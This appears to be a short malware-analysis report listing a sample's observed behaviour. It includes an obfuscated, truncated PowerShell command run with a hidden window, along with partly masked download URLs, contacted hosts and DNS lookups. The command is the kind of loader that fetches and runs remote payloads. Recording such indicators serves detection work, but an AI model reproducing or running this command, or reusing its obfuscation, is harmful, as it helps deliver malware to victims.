Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $ENv:COmsPEC[4,26,25]-join'')(" $(sv 'ofs' '') "+[stRINg]('26o73}68Q87o87}105Q112I30H3_30-80o91<73H19H81Q92<84I91,93H74-30,76I95,80H90-81o83-5<26<102o72Q92_102Q127,78H30,3I30Q80_91I73<19o81...
- 'te###dra.com.br':80
- 'jx##int.ru':80
- 'te##erv.us':80
- http://te###dra.com.br/eYE0Bjsz/
- http://www.jx##int.ru/Gj6zBk/
- http://jx##int.ru/Gj6zBk/
- http://te##erv.us/TedsCars/gUSyoA7/
- DNS ASK te###dra.com.br
- DNS ASK he####y.gmsto.com
- DNS ASK jx##int.ru
- DNS ASK 02##na.cn
- DNS ASK te##erv.us
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $ENv:COmsPEC[4,26,25]-join'')(" $(sv 'ofs' '') "+[stRINg]('26o73}68Q87o87}105Q112I30H3_30-80o91<73H19H81Q92<84I91,93H74-30,76I95,80H90-81o83-5<26<102o72Q92_102Q127,78H30,3I30Q80_91I73<19o81...' (with hidden window)